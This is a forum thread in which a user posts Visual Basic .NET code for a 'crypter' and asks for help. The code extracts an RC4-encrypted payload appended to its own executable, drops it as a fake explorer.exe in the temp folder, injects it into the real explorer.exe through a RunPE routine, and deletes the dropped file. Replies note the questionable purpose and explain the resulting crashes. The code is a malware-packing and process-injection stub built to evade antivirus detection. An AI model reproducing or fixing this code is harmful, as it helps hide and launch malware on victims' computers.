Results 1 to 4 of 4

Thread: Runpe

  1. #1

    Thread Starter
    Member
    Join Date
    May 2013
    Posts
    63

    Exclamation Runpe

    I'm Making A runtime Vb.net Crypter
    when ever i want to inject on explorer or taskmgr [runexe(fbyte, "C:\Windows\explorer.exe")] it gives me some kind of errors
    Name:  prblm.jpg
Views: 851
Size:  21.3 KB

    when i inject vbc.exe it works fine ...

    Part of my code :
    --------------------------------
    Dim temppath As String
    temppath= System.IO.Path.GetTempPath
    Dim s As String = temppath & "\explorer.exe"
    Try
    FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
    thefileon= Space(LOF(1))
    FileGet(1, thefileon)
    FileClose(1)
    Filetosplit = Split(thefileon, filesplit)
    filezafter = rc4(Filetosplit(1), "2pac")
    FileOpen(5, TPath & "\explorer.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
    FilePut(5, filezafter)
    FileClose(5)
    Catch ex As Exception
    End Try
    fbyte= System.IO.File.ReadAllBytes(temppath& "\explorer.exe")
    Try
    psrun.runexe(fbyte, "C:\Windows\explorer.exe")
    Catch ex As Exception
    End Try
    My.Computer.FileSystem.DeleteFile(s)
    ------------------------------------------------

  2. #2
    PowerPoster dunfiddlin's Avatar
    Join Date
    Jun 2012
    Posts
    8,245

    Re: Runpe

    Hmm. You are prevented from doing what, if it isn't flat out illegal, is certainly morally questionable. I can live with that!
    As the 6-dimensional mathematics professor said to the brain surgeon, "It ain't Rocket Science!"

    Reviews: "dunfiddlin likes his DataTables" - jmcilhinney

    Please be aware that whilst I will read private messages (one day!) I am unlikely to reply to anything that does not contain offers of cash, fame or marriage!

  3. #3

    Thread Starter
    Member
    Join Date
    May 2013
    Posts
    63

    Re: Runpe

    i'm doing this for educational purposes only, please Help, other thing, If i used psrun.runexe(fbyte, temppath & "\explorer.exe") the file is already droped on temp, so i delete it using my.computer.filesystem.deletefile(tempath & "\explorer.exe"), when i go to taskmgr i found explorer.exe runing and it works fine but it's not injected into explorer of windows, only the file that i named explorer, Is it runing and executable into the memory??

  4. #4
    PowerPoster techgnome's Avatar
    Join Date
    May 2002
    Posts
    34,687

    Re: Runpe

    actually to be fair... It IS letting you do it.. .but you're then corrupting explorer... and since explorer.exe is the main UI application for windows... I'm a little surprised that your system is still up and running. When you inject your ... what ever it is you're injecting into it... it's wrecking the part of the system that is continuously running... so those errors aren't totally unexpected. At least for me.

    -tg
    * I don't respond to private (PM) requests for help. It's not conducive to the general learning of others.*
    * I also don't respond to friend requests. Save a few bits and don't bother. I'll just end up rejecting anyways.*
    * How to get EFFECTIVE help: The Hitchhiker's Guide to Getting Help at VBF - Removing eels from your hovercraft *
    * How to Use Parameters * Create Disconnected ADO Recordset Clones * Set your VB6 ActiveX Compatibility * Get rid of those pesky VB Line Numbers * I swear I saved my data, where'd it run off to??? *

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  



Click Here to Expand Forum to Full Width